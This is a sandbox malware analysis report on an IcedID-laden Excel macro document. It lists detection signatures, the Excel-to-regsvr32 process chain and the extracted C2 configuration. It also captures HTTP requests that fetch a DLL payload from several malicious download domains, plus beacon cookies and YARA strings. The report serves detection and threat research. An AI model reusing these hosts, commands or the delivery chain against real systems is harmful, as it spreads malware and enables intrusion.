Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report LL52387-01-F4448869.xlsm

Overview

General Information

Sample Name:LL52387-01-F4448869.xlsm
Analysis ID:444783
MD5:17ca43c41202c41c6abae6e0e7b6ba91
SHA1:1657072df63d06f4ded461be21dfb037e51b8055
SHA256:e104c204c8757b65dcebdbd5f8c480b90fe131339f1bae0a87b61f479a49c2c3
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2388 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 956 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2172 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2089120426.0000000000110000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      Process Memory Space: regsvr32.exe PID: 956JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.regsvr32.exe.110000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30b4:$string0: _gat=
        • 0x3114:$string1: _ga=
        • 0x30ec:$string2: _gid=
        • 0x30cc:$string3: _u=
        • 0x3026:$string4: _io=
        • 0x30d8:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3080:$string9: POST
        • 0x3140:$string10: aws.amazon.com
        4.2.regsvr32.exe.110000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x1bc6:$internal_name: loader_dll_64.dll
        • 0x1f16:$string6: WINHTTP.dll
        • 0x1bea:$string7: DllRegisterServer
        • 0x1bfc:$string8: PluginInit
        4.2.regsvr32.exe.2d0000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
        • 0x27c6:$internal_name: loader_dll_64.dll
        • 0x30bc:$string0: _gat=
        • 0x311c:$string1: _ga=
        • 0x30f4:$string2: _gid=
        • 0x30d4:$string3: _u=
        • 0x302e:$string4: _io=
        • 0x30e0:$string5: GetAdaptersInfo
        • 0x2b16:$string6: WINHTTP.dll
        • 0x27ea:$string7: DllRegisterServer
        • 0x27fc:$string8: PluginInit
        • 0x3088:$string9: POST
        • 0x3148:$string10: aws.amazon.com

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2396, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2388

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 4.2.regsvr32.exe.110000.0.raw.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 956, type: MEMORY
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Software Vulnerabilities:

        barindex
        Document exploit detected (creates forbidden files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
        Document exploit detected (drops PE files)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
        Document exploit detected (UrlDownloadToFile)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
        Source: global trafficDNS query: name: thousandsyears.download
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 13.224.92.73:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: astrocycle.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 15:22:54 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 5182Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ocmxjgLt%2BvuAv4BFJerr4CJ33CfLsSewGNM04zr3hKJ8YbG4eWEAAUDw8maqaCcd08HCzArG9FIgv6XoMEZUwWFeO6zgqJi6r9r%2BiaVtE1Fv55yev2rcWCcnhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9d4c98c7f4e2b-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:6014:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:32364541373643334632324136413744; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: Joe Sandbox ViewIP Address: 172.67.198.51 172.67.198.51
        Source: Joe Sandbox ViewIP Address: 13.224.92.73 13.224.92.73
        Source: Joe Sandbox ViewIP Address: 104.21.55.83 104.21.55.83
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49168 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EB577B2.pngJump to behavior
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:6014:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:32364541373643334632324136413744; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: P-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 15:22:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jFzoqKBpgQ1bPYHzmAE4Sb6EBouSGk8Po9BU16DgdoIxPANwRHYT5%2BKPh1jvEoKT88xEYq7ricfpWb0z%2BTrQAXpxW9ulQWJvX9Oxvfr1cyksoHyJpg2K9yeHjLmE4glJ4A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9d4da8ec2c2f4-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000004.00000002.2093413569.00000000034F2000.00000004.00000001.sdmpString found in binary or memory: http://astrocycle.download/nection
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000004.00000002.2090468143.0000000002D20000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2082060851.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089261478.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089961671.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000004.00000002.2090468143.0000000002D20000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
